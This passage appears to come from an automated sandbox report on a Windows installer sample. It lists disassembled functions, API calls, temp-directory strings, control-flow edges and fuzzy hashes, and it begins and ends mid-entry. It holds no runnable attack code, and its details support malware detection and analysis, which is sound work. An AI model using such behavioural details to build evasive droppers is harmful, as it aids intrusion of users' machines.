                                                                                                                                                                                    • Instruction ID: f4b3021151c61e236b0315b1fcc5adb3b60be84788d5942dbd3e7f3cce39453d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 46c4353731e2246c325a5ee8fa82e7dbf3443aa0b1f18f7fec91e964ca525be6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86517D71900219EBDB10DF65DA4469E7BB8EF48356F14853BE800BB2D0C7789E41CBAD
                                                                                                                                                                                    Function 0040508C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 692 40508c-4050a1 693 405157-40515b 692->693 694 4050a7-4050b9 692->694 695 4050c4-4050d0 lstrlenA 694->695 696 4050bb-4050bf call 405f87 694->696 698 4050d2-4050e2 lstrlenA 695->698 699 4050ed-4050f1 695->699 696->695 698->693 700 4050e4-4050e8 lstrcatA 698->700 701 405100-405104 699->701 702 4050f3-4050fa SetWindowTextA 699->702 700->699 703 405106-405148 SendMessageA * 3 701->703 704 40514a-40514c 701->704 702->701 703->704 704->693 705 40514e-405151 704->705 705->693
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                                                                                                                                                                    • lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                                                                                                                                                                    • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0), ref: 004050E8
                                                                                                                                                                                    • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll), ref: 004050FA
                                                                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                                                                                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                                                                                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll
                                                                                                                                                                                    • API String ID: 2531174081-2772643034
                                                                                                                                                                                    • Opcode ID: 73176b0b033222a272c222bb19d3a1e41e441f303e298424a6cb10aa2d485b38
                                                                                                                                                                                    • Instruction ID: 508789985144291932d060d6ef0b432b589b283746e8f0e3613f73f9cddaab2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 73176b0b033222a272c222bb19d3a1e41e441f303e298424a6cb10aa2d485b38
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E217A71A00518BFDB119FA5CD85EDFBFA9EB05354F14807AF944AA290C6398A418F98
                                                                                                                                                                                    Function 00405552 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 706 405552-40559d CreateDirectoryA 707 4055a3-4055b0 GetLastError 706->707 708 40559f-4055a1 706->708 709 4055ca-4055cc 707->709 710 4055b2-4055c6 SetFileSecurityA 707->710 708->709 710->708 711 4055c8 GetLastError 710->711 711->709
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004055A9
                                                                                                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055BE
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004055C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00405552
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                    • API String ID: 3449924974-26219170
                                                                                                                                                                                    • Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                                                                                                                                                    • Instruction ID: d93b5df8f7ffc7c008eac1e7bdc238e6dcac3e6f5ce479452586b7e310885e58
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                                                                                                                                                    • Instruction Fuzzy Hash: 550108B1C00219EADF11DBA1CD047EFBFB9EF04354F00803AD545B6290D77896088FA9
                                                                                                                                                                                    Function 0040628F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 712 40628f-4062af GetSystemDirectoryA 713 4062b1 712->713 714 4062b3-4062b5 712->714 713->714 715 4062c5-4062c7 714->715 716 4062b7-4062bf 714->716 718 4062c8-4062fa wsprintfA LoadLibraryExA 715->718 716->715 717 4062c1-4062c3 716->717 717->718
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
                                                                                                                                                                                    • wsprintfA.USER32 ref: 004062DF
                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                                                                                                    • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                                                                                                                    • Instruction ID: 90c405808a5079913e9fc86ee6967ca4c100a0af48b71fe7beb271d56a4ee20c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F0F630510609AADB15AB64DD0DFEB365CAB08304F1405BEA686F11C1EA78E9398B99
                                                                                                                                                                                    Function 00405B2D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 719 405b2d-405b37 720 405b38-405b63 GetTickCount GetTempFileNameA 719->720 721 405b72-405b74 720->721 722 405b65-405b67 720->722 724 405b6c-405b6f 721->724 722->720 723 405b69 722->723 723->724
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405B41
                                                                                                                                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B5B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • "C:\Users\user\Desktop\asXlZG3aW6.exe", xrefs: 00405B2D
                                                                                                                                                                                    • nsa, xrefs: 00405B38
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                    • API String ID: 1716503409-580653039
                                                                                                                                                                                    • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                                                                                                                    • Instruction ID: 439a7608ba980c1fff97265348ba0c774925dff8d33d3cb941cf273fff524f8a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F082363042086BDB108F66DD04B9B7BA9DF91750F14803BFA48AA280D6B4E9588799
                                                                                                                                                                                    Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 725 100016bd-100016f9 call 10001a5d 729 1000180a-1000180c 725->729 730 100016ff-10001703 725->730 731 10001705-1000170b call 100021b0 730->731 732 1000170c-10001719 call 100021fa 730->732 731->732 737 10001749-10001750 732->737 738 1000171b-10001720 732->738 739 10001770-10001774 737->739 740 10001752-1000176e call 100023d8 call 10001559 call 10001266 GlobalFree 737->740 741 10001722-10001723 738->741 742 1000173b-1000173e 738->742 745 100017b2-100017b8 call 100023d8 739->745 746 10001776-100017b0 call 10001559 call 100023d8 739->746 766 100017b9-100017bd 740->766 743 10001725-10001726 741->743 744 1000172b-1000172c call 100027e4 741->744 742->737 747 10001740-10001741 call 10002a9f 742->747 750 10001733-10001739 call 10002587 743->750 751 10001728-10001729 743->751 757 10001731 744->757 745->766 746->766 760 10001746 747->760 765 10001748 750->765 751->737 751->744 757->760 760->765 765->737 769 100017fa-10001801 766->769 770 100017bf-100017cd call 1000239e 766->770 769->729 773 10001803-10001804 GlobalFree 769->773 775 100017e5-100017ec 770->775 776 100017cf-100017d2 770->776 773->729 775->769 778 100017ee-100017f9 call 100014e2 775->778 776->775 777 100017d4-100017dc 776->777 777->775 779 100017de-100017df FreeLibrary 777->779 778->769 779->775
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                      • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                      • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                      • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                                                                                                      • Part of subcall function 10002587: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025F9
                                                                                                                                                                                      • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1791698881-3916222277
                                                                                                                                                                                    • Opcode ID: d00fcf5c1a7409290317dea9c84c75534a881091bfcc635988d0727071c870ea
                                                                                                                                                                                    • Instruction ID: 474564f2ddd1a30fda7ef2e88bb39d7445f8f4f5c00c78564696995dcbc9c57a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d00fcf5c1a7409290317dea9c84c75534a881091bfcc635988d0727071c870ea
                                                                                                                                                                                    • Instruction Fuzzy Hash: C4319E79408205DAFB41DF649CC5BCA37ECFB042D5F118465FA0A9A09EDF78A8858B60
                                                                                                                                                                                    Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 782 401c04-401c24 call 402a9f * 2 787 401c30-401c34 782->787 788 401c26-401c2d call 402ac1 782->788 790 401c40-401c46 787->790 791 401c36-401c3d call 402ac1 787->791 788->787 792 401c94-401cba call 402ac1 * 2 FindWindowExA 790->792 793 401c48-401c64 call 402a9f * 2 790->793 791->790 807 401cc0 792->807 805 401c84-401c92 SendMessageA 793->805 806 401c66-401c82 SendMessageTimeoutA 793->806 805->807 808 401cc3-401cc6 806->808 807->808 809 402951-402960 808->809 810 401ccc 808->810 810->809
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                    • Opcode ID: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                                                                                                                                                                                    • Instruction ID: bdc01a124477b6dd133b62af0939e03034df0dda3ad70936a50ebcebbcd9d6cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F218F71A44209BEEB15DFA5D946AED7BB0EB84304F14803EF505F61D1DA7889408F28
                                                                                                                                                                                    Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                                                                                                                                                                      • Part of subcall function 0040508C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,00000000,0041AE28,761F23A0), ref: 004050E8
                                                                                                                                                                                      • Part of subcall function 0040508C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll), ref: 004050FA
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                                                                                                                                                                      • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2987980305-0
                                                                                                                                                                                    • Opcode ID: 8f2f68fe1260159639bfb28b43f5715fe2f8d879f7a621fd8f0c8717e3dae319
                                                                                                                                                                                    • Instruction ID: 3b54ba627a5d3606a08c88bc2c88048367fe0e0edc5ddf34d35ff9eabd327fef
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f2f68fe1260159639bfb28b43f5715fe2f8d879f7a621fd8f0c8717e3dae319
                                                                                                                                                                                    • Instruction Fuzzy Hash: A721DB71A04225ABCF207FA48E49B6E7670AB14358F20413BFB11B62D0CBBD4942966E
                                                                                                                                                                                    Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(?,?,0042BC78,?,00405A02,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                      • Part of subcall function 00405552: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595
                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes, xrefs: 00401631
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes
                                                                                                                                                                                    • API String ID: 1892508949-1124679380
                                                                                                                                                                                    • Opcode ID: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
                                                                                                                                                                                    • Instruction ID: 323619fe81b3529d61600e1e0eff0ce417d4ac591c1c2d39a63079fc07480124
